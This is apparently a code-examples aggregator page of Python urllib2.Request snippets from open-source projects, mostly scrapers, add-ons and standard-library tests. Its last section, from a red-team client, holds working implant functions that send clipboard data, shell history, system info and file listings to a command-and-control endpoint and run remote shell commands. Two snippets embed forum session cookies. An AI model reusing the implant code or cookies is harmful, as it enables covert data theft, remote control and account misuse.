urllib2.Request

Here are the examples of the python api urllib2.Request taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

605 Examples

3 Source : GetExpiredDomains.py
with BSD 3-Clause "New" or "Revised" License
from 3gstudent

def GetResults(loop,key):
    # Scrape paginated search results from expireddomains.net and print every
    # expired domain found on pages 2..loop (each page holds 25 results, so
    # the start offset is 25*i). Python 2 code (print statements).
    #
    # loop: number of result pages to walk (iteration starts at index 1,
    #       i.e. the second page).
    # key:  search keyword appended to the query string.
    for i in range(1,loop):
        print "[+]Page %d" %(i+1)
        url = "https://www.expireddomains.net/domain-name-search/?start=" + str(25*i) + "&q="+ key
        #print url
        req = urllib2.Request(url)
        #req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")   
        res_data = urllib2.urlopen(req)
        html = BeautifulSoup(res_data.read(), "html.parser")
 
        # Each result row keeps the domain name in the title attribute of the
        # first anchor inside <td class="field_domain">.
        tds = html.findAll("td", {"class": "field_domain"})
        for td in tds:
            print td.findAll("a")[0]["title"]
   
def SearchExpireddomains(key):

3 Source : Mercury.py
with GNU General Public License v3.0
from 4n6strider

def admin():
	links = open(x+'\Resources\links.txt')
	website = raw_input(Fore.CYAN + 'Enter a site to scan just www: ')
	type_link = raw_input('Is the link https or http: ')
	count4 = 1
	while True:
		try:
			sub_link = links.readline(count4)
			website2 = type_link+'://'+website+'/'+ sub_link
			req = Request(website2)
	    		response = urlopen(req)
		except HTTPError as e:
			print(Fore.RED  + website2) 
			count4 += 1
		except URLError as e:
    			print(Fore.RED + website2) 
    			count4 += 1
    		except  KeyboardInterrupt:

3 Source : neteasy_playlist_download.py
with MIT License
from 61Duke

    def _raw_http_request(self, method, action, query=None, urlencoded=None, callback=None, timeout=None):
        """Perform a raw HTTP request against *action* and return the body.

        method: 'GET' or 'POST' (anything else raises ValueError; the old
                code fell through and crashed with NameError instead).
        action: target URL.
        query:  dict of POST fields, urlencoded before sending.
        urlencoded/callback/timeout: accepted for interface compatibility;
                unused here (as in the original).
        """
        if method == 'GET':
            # Bug fix: self.header was passed positionally as the *data*
            # argument, which silently turned the GET into a POST whose body
            # was the header dict. Pass it as headers= (matching the POST
            # branch and get_playlist_id elsewhere in this file).
            request = urllib2.Request(action, headers=self.header)
        elif method == 'POST':
            data = urllib.urlencode(query)
            request = urllib2.Request(action, data, self.header)
        else:
            raise ValueError('unsupported HTTP method: %r' % method)
        response = urllib2.urlopen(request)
        connection = response.read()
        return connection

    @staticmethod

3 Source : neteasy_playlist_download.py
with MIT License
from 61Duke

    def get_playlist_id(self, action):
        """Fetch the page at *action* and return the playlist ids it links."""
        # Download the listing page using the instance's default headers.
        resp = urllib2.urlopen(urllib2.Request(action, headers=self.header))
        page = resp.read().decode('utf-8')
        resp.close()
        # Every playlist link is an <a class="msk"> inside the list
        # container; the id is whatever follows the first 13 characters of
        # the href.
        anchors = BeautifulSoup(page, 'lxml').select('ul#m-pl-container li div a.msk')
        return [anchor['href'][13:] for anchor in anchors]

    def get_playlist_detail(self, id):

3 Source : speedtest.py
with GNU General Public License v3.0
from a4k-openproject

def build_request(url, data=None, headers=None):
    """Build a Request for *url*, always setting our User-Agent header.

    url:     absolute URL, or a ':'-prefixed path that gets the module-level
             scheme prepended.
    data:    optional request body.
    headers: optional dict of extra headers; the caller's dict is no longer
             mutated.
    """
    # Bug fix: the old signature used a mutable default (headers={}) and
    # wrote the User-Agent into it, so the shared default dict accumulated
    # state across calls. Copy instead of mutating.
    headers = dict(headers) if headers else {}
    if url[0] == ':':
        schemed_url = '{0}{1}'.format(scheme, url)
    else:
        schemed_url = url
    headers['User-Agent'] = user_agent
    return Request(schemed_url, data=data, headers=headers)


def catch_request(request):

3 Source : yt.py
with GNU General Public License v3.0
from a4k-openproject

def FetchPage(url):
    """Download *url* with a Firefox User-Agent and YouTube referer; return
    the UTF-8 decoded body."""
    request = urllib2.Request(url)
    extra_headers = (
        ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'),
        ('Referer', 'http://www.youtube.com/'),
    )
    for name, value in extra_headers:
        request.add_header(name, value)
    return urllib2.urlopen(request).read().decode("utf-8")


def replaceHTMLCodes(txt):

3 Source : client.py
with GNU General Public License v3.0
from a4k-openproject

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
    """Open *url* and return the processed response, or None on any failure.

    headers: optional dict of request headers.
    post:    optional body; its presence makes this a POST.
    timeout: socket timeout in seconds (string or int).
    limit:   forwarded to _get_result to cap how much is read.
    """
    try:
        # Bug fix: the original did `headers.update(headers)` — updating the
        # dict with itself is a no-op whose only effect was to raise
        # AttributeError when headers was None. Make the guard explicit.
        if headers is None:
            headers = {}
        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)
        response = urllib2.urlopen(request, timeout=int(timeout))
        return _get_result(response, limit)
    except:
        # Deliberate best-effort: callers treat None as "request failed".
        return


def _add_request_header(_request, headers):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_raise(self):
        """A handler that raises URLError must abort the handler chain."""
        director = OpenerDirector()
        handlers = add_ordered_mock_handlers(director, [
            [("http_open", "raise")],
            [("http_open", "return self")],
        ])

        request = Request("http://example.com/")
        self.assertRaises(urllib2.URLError, director.open, request)
        # Only the raising handler was consulted; the second never ran.
        self.assertEqual(director.calls,
                         [(handlers[0], "http_open", (request,), {})])

##     def test_error(self):
##         # XXX this doesn't actually seem to be used in standard library,
##         #  but should really be tested anyway...

    def test_http_error(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_cookies(self):
        """HTTPCookieProcessor consults the jar on request and response."""
        jar = MockCookieJar()
        processor = urllib2.HTTPCookieProcessor(jar)
        processor.parent = MockOpener()

        request = Request("http://example.com/")
        response = MockResponse(200, "OK", {}, "")
        # Outgoing: the jar stamps cookies onto the very same request object.
        out_req = processor.http_request(request)
        self.assertTrue(jar.ach_req is request is out_req)
        self.assertEqual(request.get_origin_req_host(), "example.com")
        self.assertTrue(not request.is_unverifiable())
        # Incoming: cookies are extracted and the response passes through.
        out_resp = processor.http_response(request, response)
        self.assertTrue(jar.ec_req is request)
        self.assertTrue(jar.ec_r is response is out_resp)

    def test_redirect(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy(self):
        """ProxyHandler retargets an http request at the configured proxy."""
        director = OpenerDirector()
        director.add_handler(
            urllib2.ProxyHandler(dict(http="proxy.example.com:3128")))
        handlers = add_ordered_mock_handlers(
            director, [[("http_open", "return response")]])

        request = Request("http://acme.example.com/")
        self.assertEqual(request.get_host(), "acme.example.com")
        director.open(request)
        # After opening, the request's host has been rewritten to the proxy.
        self.assertEqual(request.get_host(), "proxy.example.com:3128")

        self.assertEqual([(handlers[0], "http_open")],
                         [call[:2] for call in director.calls])

    def test_proxy_no_proxy(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy_no_proxy(self):
        """Hosts matching $no_proxy bypass the proxy; others go through it."""
        os.environ['no_proxy'] = 'python.org'
        director = OpenerDirector()
        director.add_handler(
            urllib2.ProxyHandler(dict(http="proxy.example.com")))

        # www.perl.org is not covered by no_proxy -> rewritten to the proxy.
        proxied = Request("http://www.perl.org/")
        self.assertEqual(proxied.get_host(), "www.perl.org")
        director.open(proxied)
        self.assertEqual(proxied.get_host(), "proxy.example.com")

        # www.python.org matches no_proxy -> host left untouched.
        direct = Request("http://www.python.org")
        self.assertEqual(direct.get_host(), "www.python.org")
        director.open(direct)
        self.assertEqual(direct.get_host(), "www.python.org")
        del os.environ['no_proxy']


    def test_proxy_https(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy_https(self):
        """ProxyHandler retargets https requests at the https proxy."""
        director = OpenerDirector()
        director.add_handler(
            urllib2.ProxyHandler(dict(https='proxy.example.com:3128')))
        handlers = add_ordered_mock_handlers(
            director, [[("https_open", "return response")]])

        request = Request("https://www.example.com/")
        self.assertEqual(request.get_host(), "www.example.com")
        director.open(request)
        self.assertEqual(request.get_host(), "proxy.example.com:3128")
        self.assertEqual([(handlers[0], "https_open")],
                         [call[:2] for call in director.calls])

    def test_proxy_https_proxy_authorization(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def setUp(self):
        """Create one GET-style and one POST-style request fixture."""
        base = "http://www.python.org/~jeremy/"
        self.get = urllib2.Request(base)
        # A body plus a custom header makes this the POST fixture.
        self.post = urllib2.Request(base, "data", headers={"X-Test": "test"})

    def test_method(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_selector(self):
        """get_selector() returns the path portion of the request URL."""
        self.assertEqual(self.get.get_selector(), "/~jeremy/")
        root = urllib2.Request("http://www.python.org/")
        self.assertEqual(root.get_selector(), "/")

    def test_get_type(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_url_fragment(self):
        """Fragments are stripped from the selector but kept by geturl()."""
        cases = [
            ("http://www.python.org/?qs=query#fragment=true", "/?qs=query"),
            ("http://www.python.org/#fun=true", "/"),
        ]
        for full_url, expected_selector in cases:
            self.assertEqual(Request(full_url).get_selector(),
                             expected_selector)

        # Issue 11703: geturl() omits fragment in the original URL.
        url = 'http://docs.python.org/library/urllib2.html#OK'
        self.assertEqual(Request(url).get_full_url(), url)

    def test_private_attributes(self):

3 Source : test_urllib2net.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_urlwithfrag(self):
        """geturl() must preserve the fragment of the original URL."""
        target = "http://www.pythontest.net/index.html#frag"
        with test_support.transient_internet(target):
            response = urllib2.urlopen(urllib2.Request(target))
            self.assertEqual(response.geturl(), target)

    def test_fileno(self):

3 Source : test_urllib2net.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_fileno(self):
        """Responses from build_opener must expose a working fileno()."""
        opener = urllib2.build_opener()
        response = opener.open(urllib2.Request("http://www.example.com"))
        try:
            response.fileno()
        except AttributeError:
            self.fail("HTTPResponse object should return a valid fileno")
        finally:
            response.close()

    def test_custom_headers(self):

3 Source : test.py
with MIT License
from alexander-marquardt

    def extract_wsgi(self, environ, headers):
        """Extract the server's set-cookie headers as cookies into the
        cookie jar.
        """
        response = _TestCookieResponse(headers)
        request = U2Request(get_current_url(environ))
        self.extract_cookies(response, request)


def _iter_data(data):

3 Source : badips.py
with MIT License
from artiomn

	def isAvailable(timeout=1):
		"""Probe the badips endpoint; return (True, '') when reachable,
		otherwise (False, exception)."""
		try:
			url = "/".join([BadIPsAction._badips])
			urlopen(Request(url, headers={'User-Agent': "Fail2Ban"}),
				timeout=timeout)
			return True, ''
		except Exception as e: # pragma: no cover
			return False, e


	def getCategories(self, incParents=False):

3 Source : diagnostics.py
with Apache License 2.0
from artyompal

def _call_metadata(suffix):
  """Query the metadata service at *suffix* and return the decoded body."""
  url = METADATA_URL + suffix
  # METADATA_HEADERS carries whatever the metadata service requires.
  response = urlopen(Request(url, headers=METADATA_HEADERS))
  return response.read().decode('utf-8')


def call_instance_metadata(suffix):

3 Source : akismet.py
with MIT License
from Arx-Game

    def _fetch_url(url, data, headers):
        """POST *data* to *url* with *headers* and return the raw body."""
        request = urllib_request.Request(url, data, headers)
        return urllib_request.urlopen(request).read()


class AkismetError(Exception):

3 Source : eone.py
with MIT License
from ascmove

def get_online_info():
    """Query the legacy (possibly unstable) API for online-session info.

    Returns the comma-separated response body split into a list.
    """
    # Random cache-buster, mirroring what the web client sends.
    nonce = int(random.random() * 100000)
    payload = urllib.urlencode({'action': 'get_online_info', 'k': nonce})
    request = urllib2.Request(url=auth_action_url, data=payload)
    body = urllib2.urlopen(request).read()
    return body.split(',')


def auth_eone_logout():

3 Source : browser.py
with MIT License
from AstonZ

    def open(self, url, data=None, headers={}):
        """Open *url* (resolved against self.url) and return the response."""
        target = urllib.basejoin(self.url, url)
        request = urllib2.Request(target, data, headers)
        return self.do_request(request)

    def show(self):

3 Source : client.py
with GNU General Public License v2.0
from Atrion

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
	"""Open *url* and return the processed result, or None on any failure.

	headers: optional dict of request headers.
	post:    optional body; its presence makes the request a POST.
	timeout: socket timeout in seconds (string or int).
	limit:   forwarded to _get_result to cap how much is read.
	"""
	try:
		# Bug fix: `headers.update(headers)` was a self-update no-op whose
		# only effect was raising AttributeError when headers was None.
		if headers is None:
			headers = {}

		request = urllib2.Request(url, data=post)
		_add_request_header(request, headers)
		response = urllib2.urlopen(request, timeout=int(timeout))
		return _get_result(response, limit)
	except:
		# Deliberate best-effort: callers treat None as "request failed".
		return


def _add_request_header(_request, headers):

3 Source : navigator.py
with GNU General Public License v2.0
from Atrion

    def open_news_url(self, url):
            # Fetch *url* with a fixed 'klopp' User-Agent, echo the body to
            # stdout (Python 2 print statement) and return it.
            # NOTE(review): the body is indented deeper than one level below
            # the def in the original; kept byte-identical here.
            req = urllib2.Request(url)
            req.add_header('User-Agent', 'klopp')
            response = urllib2.urlopen(req)
            link=response.read()
            response.close()
            print link
            return link

    def news_local(self):

3 Source : client.py
with GNU General Public License v2.0
from Atrion

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
    """Open *url* and return the processed response, or None on failure.

    headers: optional dict of request headers.
    post:    optional body; presence makes this a POST.
    timeout: socket timeout in seconds (string or int).
    limit:   forwarded to _get_result to cap the read.
    """
    try:
        # Bug fix: the original called headers.update(headers), a no-op
        # self-update that existed only to trip AttributeError when headers
        # was None. Replace it with an explicit None guard.
        if headers is None:
            headers = {}

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)
        response = urllib2.urlopen(request, timeout=int(timeout))
        return _get_result(response, limit)
    except:
        # Deliberate best-effort: callers treat None as failure.
        return


def _add_request_header(_request, headers):

3 Source : downloader.py
with GNU General Public License v2.0
from Atrion

def getResponse(url, headers, size):
    """Open *url* for a (possibly resumed) download.

    url:     target URL.
    headers: dict of request headers; no longer mutated in place.
    size:    bytes already downloaded; when > 0 a Range header asks the
             server for the remainder so the download resumes.
    Returns the urllib2 response object, or None on any error.
    """
    try:
        if size > 0:
            # Copy before writing: the original stored the Range header into
            # the caller's dict, leaking resume state into later requests
            # that reused the same headers object.
            headers = dict(headers)
            headers['Range'] = 'bytes=%d-' % int(size)

        req = urllib2.Request(url, headers=headers)

        resp = urllib2.urlopen(req, timeout=30)
        return resp
    except:
        return None


def done(title, dest, downloaded):

3 Source : youtube_menu.py
with GNU General Public License v2.0
from Atrion

    def openMenuFile(self, menuFile):
        """Download *menuFile* using our user agent and return its body."""
        request = urllib2.Request(menuFile)
        request.add_header('User-Agent', self.agent)
        response = urllib2.urlopen(request)
        try:
            return response.read()
        finally:
            response.close()

    def processMenuFile(self, menuFile):

3 Source : navigator.py
with GNU General Public License v2.0
from Atrion

    def open_news_url(self, url):
            # Duplicate of the open_news_url helper in this add-on: GET *url*
            # with a 'klopp' User-Agent, print the body (Python 2) and
            # return it.
            req = urllib2.Request(url)
            req.add_header('User-Agent', 'klopp')
            response = urllib2.urlopen(req)
            link=response.read()
            response.close()
            print link
            return link

    def showText(self, heading, text):

3 Source : pastebin.py
with GNU General Public License v2.0
from Atrion

    def upload_log(self, log, name=None):
        """Upload *log* to the paste service and return the paste URL.

        log:  text to paste.
        name: accepted for interface compatibility; unused (as before).
        Raises UploaderError carrying the service's error message on any
        failure.
        """
        url = urlparse.urljoin(BASE_URL, '/api/api_post.php')
        data = {'api_dev_key': API_KEY, 'api_option': 'paste', 'api_paste_code': log, 'api_paste_name': 'Kodi Log',
                'api_paste_private': 1, 'api_paste_expire_date': EXPIRATION}
        req = Request(url, data=urllib.urlencode(data))
        try:
            html = urlopen(req).read()
        except Exception as e:
            raise UploaderError(e)
        # Bug fix: these raises used to live inside the try block, so the
        # broad `except Exception` caught the freshly raised UploaderError
        # and wrapped it in another UploaderError, mangling the message.
        if html.startswith('http'):
            return html
        elif html.upper().startswith('BAD API REQUEST'):
            raise UploaderError(html[len('Bad API request, '):])
        else:
            raise UploaderError(html)
            
    def send_email(self, email, results):

3 Source : tvaddons.py
with GNU General Public License v2.0
from Atrion

    def send_email(self, email, results):
        """Mail *results* to *email* via the log service.

        Returns True on success, False when the service response lacks a
        'result' key. Raises UploaderError on transport/parse failure or
        when the service reports an error.
        """
        url = urlparse.urljoin(BASE_URL, '/mail_logs.php')
        data = {'email': email, 'results': results}
        headers = {'Content-Type': 'application/json'}
        req = Request(url, data=json.dumps(data), headers=headers)
        try:
            html = urlopen(req).read()
            js_data = json.loads(html)
        except Exception as e:
            raise UploaderError(e)
        # Bug fix: raising UploaderError inside the try block was caught by
        # the broad `except Exception` and double-wrapped, hiding the
        # service's message.
        if 'result' in js_data:
            if js_data['result'] == 'success':
                return True
            raise UploaderError(js_data.get('msg', 'Unknown Error'))
        return False

3 Source : api-call.py
with Apache License 2.0
from autopi-io

def execute(cmd, *args, **kwargs):
    """POST a command to the local dongle API and return the decoded reply."""
    url = "http://localhost:9000/dongle/{:}/execute/".format(get_minion_id())
    payload = json.dumps({"command": cmd, "arg": args, "kwarg": kwargs})
    extra = {"Content-Type": "application/json", "Content-Length": len(payload)}
    request = urllib2.Request(url, payload, extra)
    with closing(urllib2.urlopen(request)) as reply:
        return json.loads(reply.read())

def state_output(res):

3 Source : index.py
with Apache License 2.0
from awslabs

def callJobTranscription(event):
    """Fetch the finished transcript for the job named by event['fileUUID'].

    Returns the transcript's list of items.
    """
    transcribe = boto3.client("transcribe")

    print("Call the job to download transcription")
    job_name = event.get("fileUUID")
    job = transcribe.get_transcription_job(TranscriptionJobName=job_name)
    transcript_uri = (job.get("TranscriptionJob")
                      .get("Transcript").get("TranscriptFileUri"))
    # Download the transcript JSON from the pre-signed URI.
    opener = urllib2.build_opener()
    handle = opener.open(urllib2.Request(transcript_uri))
    payload = json.loads(handle.read())
    return payload.get("results").get("items")


def makeVTTFile(items):

3 Source : virustotal.py
with MIT License
from b0bac

    def _file_rescan(self,_id):
        # Ask VirusTotal to rescan one or more previously submitted files.
        # Python 2 code (`except Exception, reason` syntax).
        #
        # _id: a single resource id, or a list of ids (the batch form joins
        #      them with commas for the API).
        # Returns the raw JSON response body, or None on any error.
        _string = ''
        if isinstance(_id,list):
            for sid in _id:
                _string += "%s,"%sid
        else:
            _string = '%s,'%str(_id)
        # Drop the trailing comma appended above.
        _string = _string[0:-1]
        _parameters = {"resource":_string,"apikey":self._key}
        try:
            data = urllib.urlencode(_parameters)
            _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan",data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception, reason:
            return None
        return _json

    def _fast_check(self,_file):

3 Source : virustotal.py
with MIT License
from b0bac

    def _get_report(self,_sha256):
        # Fetch the VirusTotal scan report for *_sha256* (any resource id
        # the API accepts). Python 2 code (`except Exception, reason`).
        # Returns the raw JSON response body, or None on any error.
        _url = "https://www.virustotal.com/vtapi/v2/file/report"
        _parameters = {"resource":_sha256,"apikey":self._key}
        try:
            _data = urllib.urlencode(_parameters)
            # NOTE(review): `_requset` is a typo for `_request`; harmless but
            # worth renaming in a functional pass.
            _requset = urllib2.Request(_url,_data)
            _response = urllib2.urlopen(_requset)
            _json = _response.read()
        except Exception, reason:
            return None
        return _json

    def check_file(self,_hash=None,_file=None):

3 Source : bazelisk.py
with MIT License
from bark-simulator

def read_remote_text_file(url):
  """Fetch *url* (with GitHub token auth when configured) and return text."""
  request = Request(url)
  try:
    token = os.environ["BAZELISK_GITHUB_TOKEN"]
    request.add_header('Authorization', 'token %s' % token)
  except KeyError:
    # No token in the environment: proceed unauthenticated.
    pass
  with closing(urlopen(request)) as res:
    body = res.read()
    try:
      # Python 3: honor the response charset, defaulting to iso-8859-1.
      return body.decode(res.info().get_content_charset("iso-8859-1"))
    except AttributeError:
      # Python 2.x compatibility hack
      return body.decode(res.info().getparam("charset") or "iso-8859-1")


def get_version_history(bazelisk_directory):

3 Source : wdl_runner.py
with BSD 3-Clause "New" or "Revised" License
from broadinstitute

def gce_get_metadata(path):
  """Query the GCE metadata server for *path* and return the raw body."""
  url = 'http://metadata/computeMetadata/v1/%s' % path
  # The Metadata-Flavor header is required by the metadata service.
  request = urllib2.Request(url, None, {'Metadata-Flavor': 'Google'})
  return urllib2.urlopen(request).read()


class Runner(object):

3 Source : get-poetry.py
with MIT License
from BSlience

    def _get(self, url):
        """Download *url* with the Poetry user agent; return the raw bytes."""
        request = Request(url, headers={"User-Agent": "Python Poetry"})
        with closing(urlopen(request)) as response:
            return response.read()


def main():

3 Source : default.py
with GNU General Public License v3.0
from bugatsinho

def open_url(url):
    """GET *url* using the module-level user agent and return the body."""
    request = urllib2.Request(url)
    request.add_header('User-Agent', ua)
    response = urllib2.urlopen(request)
    try:
        return response.read()
    finally:
        response.close()

def GET_url(url):

3 Source : posttest.py
with GNU General Public License v3.0
from bupticybee

def post(url, data):
    """POST urlencoded *data* to *url* with a canned forum session cookie;
    return the response body."""
    request = urllib2.Request(url)
    encoded = urllib.urlencode(data)
    # Cookie-aware opener carrying the hard-coded session cookie.
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    opener.addheaders.append(('Cookie', 'nforum[UTMPUSERID]=notahacker2; nforum[UTMPKEY]=47086690; nforum[UTMPNUM]=4149; nforum[PASSWORD]=85pdI27XmRI9pdWLe%2Fk6CQ%3D%3D; Hm_lvt_a2cb7064fdf52fd51306dd6ef855264a=1472200699; Hm_lpvt_a2cb7064fdf52fd51306dd6ef855264a=1472974880'))
    reply = opener.open(request, encoded)
    return reply.read()

def reply(board,articleid,subject,reply):  

3 Source : receiver.py
with GNU General Public License v3.0
from bupticybee

def post(url, data):
	"""POST urlencoded *data* to *url* using a canned session cookie and
	return the response body."""
	request = urllib2.Request(url)
	body = urllib.urlencode(data)
	# Cookie-aware opener with the hard-coded forum session cookie attached.
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
	opener.addheaders.append(('Cookie', 'nforum[UTMPUSERID]=notahacker2; nforum[UTMPKEY]=47086690; nforum[UTMPNUM]=4149; nforum[PASSWORD]=85pdI27XmRI9pdWLe%2Fk6CQ%3D%3D; Hm_lvt_a2cb7064fdf52fd51306dd6ef855264a=1472200699; Hm_lpvt_a2cb7064fdf52fd51306dd6ef855264a=1472974880'))
	result = opener.open(request, body)
	return result.read()

def api_reply(board,articleid,subject,reply):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def clipboard():
    # Red-team example (public repo): read the macOS general pasteboard and
    # POST its contents to the hard-coded local endpoint; on failure, POST
    # the error text instead. Responses are read and discarded.
    # NOTE(review): pString2 is computed but never sent — the request body
    # carries the raw pasteboard string.
    try:
        pboard = NSPasteboard.generalPasteboard()
        pString = pboard.stringForType_(NSStringPboardType)
        pString2 = str(pString).encode('utf8')
        v = {'content':pString}
        s = 'https://127.0.0.1/validatiion/profile/6'
        r = urllib2.Request(s,headers=headers,data=v.get('content'))
        re = urllib2.urlopen(r,context=context)
        respn = re.read()
    except Exception as e:
        values = {'error':str(e)}
        srv = 'https://127.0.0.1/validatiion/profile/6'
        request = urllib2.Request(srv,headers=headers,data=values.get('error'))
        response = urllib2.urlopen(request,context=context)
        resp = response.read()
########################
def pwd():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def pwd():
    # POST the current working directory to the hard-coded local endpoint;
    # on failure, POST the error text to the same endpoint instead.
    try:
        curdir = os.getcwd()
        d = {'content':curdir}
        k = 'https://127.0.0.1/validatiion/profile/3'
        b = urllib2.Request(k,headers=headers,data=d.get('content'))
        c = urllib2.urlopen(b,context=context)
        q = c.read()
    except Exception as e:
        d = {'error':str(e)}
        k = 'https://127.0.0.1/validatiion/profile/3'
        b = urllib2.Request(k,headers=headers,data=d.get('error'))
        c = urllib2.urlopen(b,context=context)
        q = c.read()
#########################
def listdir():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def listdir():
    # POST a comma-joined listing of subdirectories and files of the current
    # directory to the hard-coded endpoint; on failure, POST the error text.
    # NOTE(review): the except clause rebinds `e` (the exception) with the
    # response body — harmless, but the shadowing is confusing.
    try:
        dirs = glob("./*/")
        files = [x for x in os.listdir('.') if os.path.isfile(x)]
        total = dirs + files
        total2 = ','.join(total)
        a = {'content':total2}
        b = 'https://127.0.0.1/validatiion/profile/5'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/5'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
###########################
def cd(data):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def cd(data):
    # Change the process working directory to the path embedded in *data*
    # (a string of the form '["cd <path>') and report success or the error
    # text to the hard-coded endpoint.
    try:
        data2 = data.replace('["cd ','')
        os.chdir(data2)
        a = {'content':'[+] Successfully changed dir to %s'%data2}
        b = 'https://127.0.0.1/validatiion/profile/4'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/4'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
############################
def systeminfo():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def systeminfo():
    # Run the AppleScript "get system info", strip the NSAppleEventDescriptor
    # wrapper from its string form, and POST the result (or the error text)
    # to the hard-coded endpoint.
    try:
        s = NSAppleScript.alloc().initWithSource_("get system info")
        p = s.executeAndReturnError_(None)
        p2 = str(p).replace("  <  NSAppleEventDescriptor: ","").replace(">, None)", "")
        a = {'content':p2}
        b = 'https://127.0.0.1/validatiion/profile/14'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/14'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
############################
def listusers():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def addresses():
    # POST the host's network addresses (stringified NSHost addresses
    # attribute) to the hard-coded endpoint; on failure, POST the error.
    try:
        s = NSHost.currentHost().addresses
        p = str(s)
        a = {'content':p}
        b = 'https://127.0.0.1/validatiion/profile/9'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/9'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
#############################
def prompt():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def userhist():
    # POST the current user's zsh history file contents to the hard-coded
    # endpoint; on failure (e.g. no ~/.zsh_history), POST the error text.
    try:
        s = open('/Users/%s/.zsh_history'%str(getpass.getuser()),'r').read()
        a = {'content':s}
        b = 'https://127.0.0.1/validatiion/profile/11'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/11'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
##############################
def checksecurity():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def srun(data):
    # Execute the shell command embedded in *data* (prefix '["shell ') via
    # the Python 2 commands module and POST the (status, output) tuple —
    # or the error text — to the hard-coded endpoint.
    try:
        data2 = str(data).replace('["shell ',"")
        sendstring = str(commands.getstatusoutput("%s" % data2))
        a = {'content':sendstring}
        b = 'https://127.0.0.1/validatiion/profile/16'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/16'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
###############################
def sspawn(data):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def ckin():
    # Poll the server's status endpoint and return the response body split
    # on the '+++++' delimiter. Any failure is swallowed and the function
    # implicitly returns None.
    try:
        url2 = 'https://127.0.0.1/validate/status'
        request = urllib2.Request(url2,headers=headers)
        response = urllib2.urlopen(request,context=context)
        data_read = response.read()
        datalist = str(data_read).split('+++++')
        return datalist
    except Exception as e:
        pass
################################
def runjxa(data):

See More Examples